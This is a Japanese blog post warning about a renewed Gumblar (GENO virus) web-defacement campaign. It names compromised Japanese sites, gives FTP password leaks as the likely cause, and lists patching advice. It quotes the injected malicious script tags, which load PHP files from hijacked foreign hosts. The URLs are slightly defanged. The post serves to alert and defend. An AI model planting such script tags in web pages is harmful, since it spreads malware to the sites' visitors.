|
「Gumblar」「JSRedir-R」(通称、GENOウイルス)攻撃者によるものと思われる新たなウェブ改ざん攻撃。おとといの13日に記事を書いて以降もちょっと調べてましたが、実害にあわれた方も・・・。 この被害を受けてしまってる日本国内の正規サイトの数は、もしかしたら3桁いっちゃてるかもしれないので、ちょっと踏み込んだ情報を載せます。 この記事を書いてる15日20時時点で、下の2サイトはこの被害を受けてしまってます。あくまで一例で、これ以外にも複数の個人サイトや会社サイトが被害を受けてることを確認してます。5月の時の騒動でもそうでしたが、「変なサイトに行かないから安全」は通用しないです。  ・宮崎あおいさん、工藤夕貴さん、多部未華子さんなど有名な方が所属する芸能事務所 ヒラタオフィスさん ・埼玉の公園紹介ページの 財団法人 埼玉県公園緑地協会さん 上の2サイトを例にすると、BODYタグの直前に下のような不正なJavaScriptタグが存在します。FTPのパスワードが漏れて、外部から挿入されたんだと思います。 ちなみに、Google検索やブラウザのFirefox、Chromeに用意されてるGoogleセーフブラウジングの警告機能は、攻撃者が対策してるためだと思いますが働きません。 </head> <script src=http://soulhealer.com/class/chat/localization/finnish/sort_languages●php > </script><body </head> <script src=http://yondental.co.kr/bbs/private_board●php ></script><body>このJavaScriptタグで導かれてる「.co.kr」と「.com」は、どちらも海外の正規サイトのようです。こちらもFTPのパスワードが漏れて、攻撃者の物置状態になってしまってます。src属性で指定されてるサイトは、これ以外にもたくさんあります。特徴として、必ずPHPファイル「〜.php」を呼ぶようになってます。 ・「Adobe Flash Player」と「Adobe Reader」を最新バージョンに更新 ・Microsoft系プログラムの更新を行う「Windows Update」(Microsoft Update) がちゃんと行われていれば、悪用されると思われる脆弱性がふさがれてるため、閲覧したことによるウイルス発動はないと思います。(あとはブラウザのJavaScript無効) ☆ Gumblar(GENOウイルス)再来襲の最新情報はこちら! (16日追記...) 5月のGENOウイルス騒動で、早い段階から情報を発信してた海外のセキュリティ会社ScanSafeのブログが15日付けで更新され、Gumblarが”目を覚ました”という記事「Gumblar Website Botnet Awakes」が投稿されました。 |
>
- コンピュータとインターネット
>
- インターネット
>
- その他インターネット
